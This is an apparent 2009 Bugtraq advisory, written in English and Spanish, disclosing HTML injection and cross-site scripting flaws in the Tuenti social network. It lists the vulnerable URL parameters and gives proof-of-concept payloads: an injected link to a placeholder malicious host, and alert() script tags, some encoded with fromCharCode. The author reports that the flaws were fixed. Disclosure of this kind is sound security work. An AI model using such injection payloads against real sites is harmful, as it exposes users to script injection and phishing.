MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->
From: y3nh4ck3r@xxxxxxxxx
Date: Thu, 14 May 2009 10:47:57 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

####################
Language: English
####################

------------------------------------------------------------
MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->
------------------------------------------------------------

SYSTEM INFORMATION:

-->WEB: http://www.tuenti.com/
-->DOWNLOAD: No there.
-->DEMO: N/A
-->CATEGORY: Social Networking
-->DESCRIPTION: Tuenti is the biggest and most popular social network in Spain. 

SYSTEM VULNERABILITY:

-->TESTED ON: firefox 3 and Internet Explorer 6.0
-->CATEGORY: HTML CODE INJECTION / XSS
-->Discovered Bug date: 2009-05-04
-->Reported Bug date: 2009-05-04
-->Fixed bug date: 2009-05-12
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su 
apoyo.
-->EXTRA-COMMENT: Xikitiya no me odies por esto jajaja


#################
/////////////////

HTML INJECTION:

/////////////////
#################


Go to --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos


Vuln GET var --> 'cat_id'


Note: Here was not possible a XSS attack


------------------
PROOF OF CONCEPT:
------------------


http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos";><A 
HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>


Return --> New link on footer


#############################
/////////////////////////////

CROSS SITE SCRIPTING (XSS):

/////////////////////////////
#############################


<<<<---------++++++++++++++ Condition: Be registered user 
+++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Be friends (victim/attacker) 
+++++++++++++++++--------->>>>


Go to --> 
http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031


Vuln GET var --> 'items'


------------------
PROOF OF CONCEPT:
------------------


http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031";><script>alert('y3nh4ck3r
 was here')</script>


Return --> Alert message


<<<<---------++++++++++++++ Condition: Be registered user 
+++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Nothing 
+++++++++++++++++--------->>>>


Go to --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload


Vuln GET var --> 'cat_id'


------------------
PROOF OF CONCEPT:
------------------


http://www.tuenti.com/#m=videos&view=category&cat_id=upload";><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Return --> Alert message


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Nothing 
+++++++++++++++++--------->>>>


Go to --> http://www.tuenti.com/?need_invite=1


Vuln POST var --> 'email'


------------------
PROOF OF CONCEPT:
------------------


email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Return --> Alert message


----------------
FINAL REMARK:
----------------


Staff's members have fixed successfully these vulnerabilites ;)


####################
Language: Spanish
####################

----------------------------------------------------------------------
MÚLTIPLES VULNERABILIDADES DE INYECCIÓN DE CÓDIGO --TUENTI--ESPAÑA->
----------------------------------------------------------------------

INFORMACIÓN DEL SISTEMA:

-->WEB: http://www.tuenti.com/
-->DESCARGA: No hay
-->DEMO: No disponible
-->CATEGORÍA: Red social
-->DESCRIPCIÓN: Tuenti es la mayor y más popular red social en España.  

VULNERABILIDAD DEL SISTEMA:

-->PROBADO EN: firefox 3 y Internet Explorer 6.0
-->CATEGORÍA: INYECCIÓN DE CÓDIGO HTML/ XSS.
-->Fecha de descubrimiento del bug: 2009-05-04
-->Fecha de aviso al sistema: 2009-05-04
-->Fecha de fijación del bug: 2009-05-12
-->Autor: YEnH4ckEr
-->Correo: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: No disponible
-->Comentario: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por 
su apoyo.
-->Comentario-extra: Xikitiya no me odies por esto jajaja


#################
/////////////////

INYECCIÓN HTML:

/////////////////
#################


Ir a --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos


Variable GET vulnerable --> 'cat_id'


Nota: Aquí no fue posible un ataque XSS


-------------------
PRUEBA DE CONCEPTO:
-------------------


http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos";><A 
HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>


Devuelve --> Nuevo enlace en el pie de página


#############################
/////////////////////////////

CROSS SITE SCRIPTING (XSS):

/////////////////////////////
#############################


<<<<---------++++++++++++++ Condición: Ser usuario registrado 
+++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condición-extra: Ser amigos (víctima/atacante) 
+++++++++++++++++--------->>>>


Ir a --> 
http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031


Variable GET vulnerable --> 'items'


-------------------
PRUEBA DE CONCEPTO:
-------------------


http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031";><script>alert('y3nh4ck3r
 was here')</script>


Devuelve --> Mensaje de alerta


<<<<---------++++++++++++++ Condición: Ser usuario registrado 
+++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condición-extra: Nada +++++++++++++++++--------->>>>


Ir a --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload


Variable GET vulnerable --> 'cat_id'


-------------------
PRUEBA DE CONCEPTO:
-------------------


http://www.tuenti.com/#m=videos&view=category&cat_id=upload";><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Devuelve --> Mensaje de alerta


<<<<---------++++++++++++++ Condición: Nada +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condición-extra: Nada +++++++++++++++++--------->>>>


Ir a --> http://www.tuenti.com/?need_invite=1


Variable POST vulnerable --> 'email'


-------------------
PRUEBA DE CONCEPTO:
-------------------


email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Devuelve --> Mensaje de alerta


-------------------
OBSERVACIÓN FINAL:
-------------------

El equipo de trabajo ha fijado con éxito estas vulnerabilidades ;)


#######################################################################
#######################################################################
##*******************************************************************##
##      SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ...     ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################

Prev by Date: Re: Insufficient Authentication vulnerability in Asus notebook
Next by Date: MULTIPLE SQL INJECTION VULNERABILITIES --Shutter v-0.1.1-->
Previous by thread: iDefense Security Advisory 05.14.09: Apple Mac OS X xnu Kernel workqueue_additem/workqueue_removeitem Index Validation Vulnerability
Next by thread: MULTIPLE SQL INJECTION VULNERABILITIES --Shutter v-0.1.1-->
Index(es):
- Date
- Thread